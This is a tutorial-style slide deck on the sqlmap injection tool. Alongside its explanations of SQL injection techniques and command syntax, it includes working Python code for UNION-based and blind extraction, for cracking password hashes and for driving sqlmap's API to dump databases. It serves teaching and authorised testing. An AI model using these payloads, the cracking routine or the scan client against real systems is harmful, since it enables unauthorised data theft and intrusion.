This deck is a quick introduction to sqlmap, an open-source penetration-testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. The slides cover the history of sqlmap, how it works, and the most important sqlmap commands.
2. An open-source penetration-testing tool, mostly used for web application pentesting
A Python-based tool
Detects and exploits SQL injection flaws in web applications to reach and take over the back-end database
Supports a wide range of database management systems
Comes pre-installed in Kali Linux
3. Bernardo Damele
Bernardo took over the sqlmap project, originally started by Daniele Bellucci, and promoted and presented it at Black Hat Europe in 2009.
Miroslav Stampar
Miroslav answered the project's call for developers and joined it in 2009. Miroslav and Bernardo released the first stable version of sqlmap (0.8) in 2010.
4. In Windows: before installing sqlmap, make sure the system has Python installed.
To install Python, visit the link and follow the steps: https://www.python.org/downloads/
After installing Python, download sqlmap from https://sqlmap.org/ and follow the steps and instructions given there.
In Kali Linux: sqlmap comes pre-installed. Just open a shell and type sqlmap.
Ubuntu/other Linux distros: follow the steps and instructions at https://www.ma-no.org/en/security/sqlmap-installation-and-usage-in-ubuntu-and-kali-linux
On macOS: follow the steps and instructions at https://macappstore.org/sqlmap/
7. SQL
Standard programming language used for querying and managing relational databases
MySQL, Oracle, Sybase, SQL Server and PostgreSQL are some examples of relational database management systems
DQL, DDL, DML and DCL are the main categories of SQL statements
Developed at IBM in the early 1970s; standardized by ANSI in 1986 and by ISO in 1987
8. SQL INJECTION
A web application vulnerability
Ranked in the OWASP Top 10 (under Injection)
The attacker injects malicious SQL into the queries the application sends to its database
Can read and modify sensitive data in the server's database and, depending on the DBMS and its configuration, execute commands on the database server
9. Hacker -> web API server -> victim's database
Request sent by the hacker: http://example.com/?user=007' or '1'='1';--
Query the server builds from it: SELECT * FROM users WHERE user='007' or '1'='1';--'
The OR makes the WHERE clause true for every row, so the database returns all of its data and the hacker can access all of it.
10. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
Boolean-based blind: the attacker injects a condition into the query so that the application's behaviour depends on whether it evaluates to true or false: the content of the HTTP response changes or stays the same. This lets the attacker decide whether the injected condition was true or false, and so infer data one bit at a time, even though no database content is ever returned directly.
Time-based blind: the attacker injects a condition that makes the database delay its response (for example with a sleep function) only when the condition is true. The response time then indicates whether the result is true or false, which matters when true and false produce identical page content.
11. Error-based: this technique forces the database to generate an error message that contains the result of an attacker-chosen sub-query, giving the attacker information about the database and its data.
UNION-based: this technique uses the SQL UNION operator to append the rows of an attacker-chosen SELECT to the result set of the original query, so the extracted data appears directly in the application's response. It lets the attacker extract information quickly, but requires the same number of columns and compatible types in both SELECTs.
Stacked queries: in SQL a semicolon (;) terminates a statement. If the application's database driver allows several statements in one request, the attacker can terminate the original query and append new statements, such as INSERT, UPDATE or DROP, and so change data in the database.
Out-of-band: this technique mostly depends on features being enabled on the database server used by the web application. It is used when an attacker cannot use the same channel to launch the attack and gather results. It relies on the database server's ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree stored procedure, which can be used to make DNS requests to a server the attacker controls, and Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server the attacker controls.
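The slide-9 request and two of the techniques above (UNION-based and boolean-based blind), worked by hand against an in-memory SQLite database so the mechanics are visible. This is an added example, not code from the slides or from sqlmap itself; the users table, its secret column and the sample rows are constructed for the demonstration. Time-based and out-of-band variants are left out because SQLite has no sleep or network functions.

```python
import sqlite3

# Constructed sample data standing in for the victim's database: a users table
# whose `secret` column the attacker wants to read.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, secret TEXT);
    INSERT INTO users VALUES (1, '007', 'k3y-bond');
    INSERT INTO users VALUES (2, 'admin', 'k3y-admin');
""")


def vulnerable_lookup(user):
    """The bug sqlmap hunts for: the `user` parameter is pasted into the SQL
    text, so a quote in it ends the string literal and the rest becomes SQL."""
    sql = f"SELECT id, user FROM users WHERE user = '{user}'"
    return conn.execute(sql).fetchall()


def safe_lookup(user):
    """The fix: a bound parameter is sent as data and can never become SQL."""
    return conn.execute("SELECT id, user FROM users WHERE user = ?", (user,)).fetchall()


def tautology_bypass():
    """Slide 9: `' OR '1'='1` makes the WHERE clause true for every row."""
    return vulnerable_lookup("' OR '1'='1")


def union_extract():
    """UNION-based: UNION appends attacker-chosen rows (here every secret) to
    the result set of the original query; `--` comments out the trailing quote."""
    return vulnerable_lookup("x' UNION SELECT id, secret FROM users --")


def oracle(condition, target_user="007"):
    """Boolean-based blind: the attacker only sees whether the page shows a
    record (a row came back) or not, never the data inside the condition."""
    return bool(vulnerable_lookup(f"{target_user}' AND ({condition}) --"))


def blind_extract_secret(target_user="007"):
    """Recover users.secret one character at a time through the oracle.
    A binary search on the character code needs about seven requests per
    character instead of one request per printable character. Assumes the
    secret is printable ASCII; other code points would need a wider range."""
    recovered = ""
    pos = 1
    # SUBSTR past the end is empty, so LENGTH tells us when to stop.
    while oracle(f"LENGTH(secret) >= {pos}", target_user):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"UNICODE(SUBSTR(secret, {pos}, 1)) > {mid}", target_user):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
        pos += 1
    return recovered


if __name__ == "__main__":
    print("tautology:", tautology_bypass())
    print("union:    ", union_extract())
    print("blind:    ", blind_extract_secret())
    print("safe:     ", safe_lookup("' OR '1'='1"))
```

The parameterised `safe_lookup` returns no rows for the same payloads, which is the whole point of the fix: the quote never leaves the data channel. sqlmap's value is that it finds the injectable parameter and runs the character-by-character loop for you, with retries and response comparison heuristics, against real HTTP responses.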
14. Support to directly connect to the database without passing through an SQL injection, by providing DBMS credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
Support to dump database tables entirely, a range of entries, or specific columns, as per the user's choice. The user can also choose to dump only a range of characters from each column's entry.
Support to search for specific database names, specific tables across all databases, or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where the relevant columns' names contain strings like name and pass.
Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
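What "automatic recognition of password hash formats" followed by a dictionary attack looks like in code, as an added example. It is not sqlmap's own implementation (which covers many more formats); the detectors, the dumped rows and the wordlist below are constructed for the illustration. Hash shapes the detector does not know, such as salted bcrypt, are reported as unrecognised rather than guessed at.

```python
import hashlib
import re

# Formats the example recognises: name -> (pattern of the stored form, function
# hashing a candidate password into that form). Unsalted formats only.
FORMATS = {
    "md5": (re.compile(r"^[0-9a-f]{32}$", re.I),
            lambda pw: hashlib.md5(pw.encode()).hexdigest()),
    "sha1": (re.compile(r"^[0-9a-f]{40}$", re.I),
             lambda pw: hashlib.sha1(pw.encode()).hexdigest()),
    "sha256": (re.compile(r"^[0-9a-f]{64}$", re.I),
               lambda pw: hashlib.sha256(pw.encode()).hexdigest()),
    # MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(pw)) in upper-case hex.
    "mysql": (re.compile(r"^\*[0-9A-F]{40}$"),
              lambda pw: "*" + hashlib.sha1(
                  hashlib.sha1(pw.encode()).digest()).hexdigest().upper()),
}


def identify(stored_hash):
    """Return the format name whose pattern matches, or None if none does."""
    for name, (pattern, _) in FORMATS.items():
        if pattern.match(stored_hash):
            return name
    return None


def crack(stored_hash, wordlist):
    """Dictionary attack: hash each candidate in the recognised format and
    compare. Returns the password, or None if the format is unknown or the
    password is not in the list."""
    fmt = identify(stored_hash)
    if fmt is None:
        return None
    compute = FORMATS[fmt][1]
    target = stored_hash.lower()
    for word in wordlist:
        if compute(word).lower() == target:
            return word
    return None


def crack_dump(rows, wordlist):
    """Apply crack() to (username, hash) rows as dumped from a credentials table."""
    return {user: crack(h, wordlist) for user, h in rows}


# Constructed sample dump and wordlist (not data from any real system).
SAMPLE_ROWS = [
    ("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),         # md5('password')
    ("bob", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),  # MySQL PASSWORD('password')
    ("carol", "$2b$12$notarealbcrypthashjustaplaceholderforthisexample0"),  # salted: skipped
]
SAMPLE_WORDLIST = ["123456", "letmein", "password", "qwerty"]

if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_ROWS, SAMPLE_WORDLIST).items():
        print(f"{user}: {pw if pw else 'not cracked'}")
```

The shape-based detection is the same heuristic sqlmap applies after a dump: a 32-hex string is treated as MD5, a 40-hex string as SHA-1, a leading `*` plus 40 upper-case hex as a MySQL hash, and so on. Because these formats are unsalted and fast, a short wordlist already recovers weak passwords; a per-user salt or a slow hash such as bcrypt defeats this approach, which is why the example refuses to guess at them.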
15. Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as per the user's choice.
Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
22. Basic syntax: sqlmap -u URL | -r FILE [options]
GET request: sqlmap -u "http://example.com/page.php?id=1"
Using a saved request file (for example, a request captured with a proxy): sqlmap -r request.txt
Injection point marked with * in the URL path: sqlmap -u "http://example.com/page*/view" --dbs
POST request, testing only the username parameter: sqlmap -u http://example.com/login.php --data "username=admin&password=admin&submit=submit" -p username
Using cookies: sqlmap -u http://example.com/enter.php --cookie="PHPSESSID=4582s5545gfsg77854"
Database enumeration: sqlmap -u "http://example.com/page.php?id=1" --dbs
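The same commands can be driven programmatically through sqlmap's REST API (sqlmapapi.py) rather than the shell. The client below is an added example, not part of the slides or of sqlmap; it assumes an API server started with python sqlmapapi.py -s, listening on its default address 127.0.0.1:8775 (override with the SQLMAPAPI_URL environment variable, an assumption of this example), and a target you are authorised to test. The option keys are sqlmap's own internal option names behind the command-line flags (--dbs is getDbs, --dump is dumpTable, -D is db, -T is tbl, -p is testParameter, --data is data, --cookie is cookie).

```python
import json
import os
import time
import urllib.request

# Base URL of a running `python sqlmapapi.py -s` (assumed default address).
API = os.environ.get("SQLMAPAPI_URL", "http://127.0.0.1:8775")


def build_options(url, *, data=None, cookie=None, param=None,
                  dbs=False, db=None, tbl=None, dump=False,
                  level=1, risk=1):
    """Map the command-line forms from slide 22 onto API option keys.
    Unset options are omitted so sqlmap keeps its defaults; `batch` answers
    interactive prompts with the default so an unattended scan never blocks."""
    opts = {"url": url, "batch": True, "level": level, "risk": risk}
    if data is not None:
        opts["data"] = data            # --data "username=...&password=..."
    if cookie is not None:
        opts["cookie"] = cookie        # --cookie="PHPSESSID=..."
    if param is not None:
        opts["testParameter"] = param  # -p username
    if dbs:
        opts["getDbs"] = True          # --dbs
    if db is not None:
        opts["db"] = db                # -D <database>
    if tbl is not None:
        opts["tbl"] = tbl              # -T <table>
    if dump:
        opts["dumpTable"] = True       # --dump
    return opts


def _call(path, body=None):
    """GET when there is no body, POST JSON otherwise; decode the JSON reply."""
    payload = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(API + path, data=payload,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def run_scan(options, poll_seconds=2):
    """Create a task, start it with the given options, wait until the engine
    reports it is no longer running, collect the results, and delete the task."""
    task = _call("/task/new")["taskid"]
    started = _call(f"/scan/{task}/start", options)
    if not started.get("success"):
        raise RuntimeError(f"scan did not start: {started}")
    while _call(f"/scan/{task}/status")["status"] == "running":
        time.sleep(poll_seconds)
    result = _call(f"/scan/{task}/data")
    _call(f"/task/{task}/delete")
    if result.get("error"):
        raise RuntimeError(f"scan reported errors: {result['error']}")
    return result["data"]


if __name__ == "__main__":
    # Equivalent of: sqlmap -u "http://example.com/page.php?id=1" --dbs --batch
    for item in run_scan(build_options("http://example.com/page.php?id=1", dbs=True)):
        print(item)
```

Each task runs in its own sqlmap engine process on the server, so several scans can be queued and polled from one script; `/scan/<taskid>/data` returns the same findings (injection points, enumerated databases, dumped rows) the command-line tool prints, as structured JSON instead of console text.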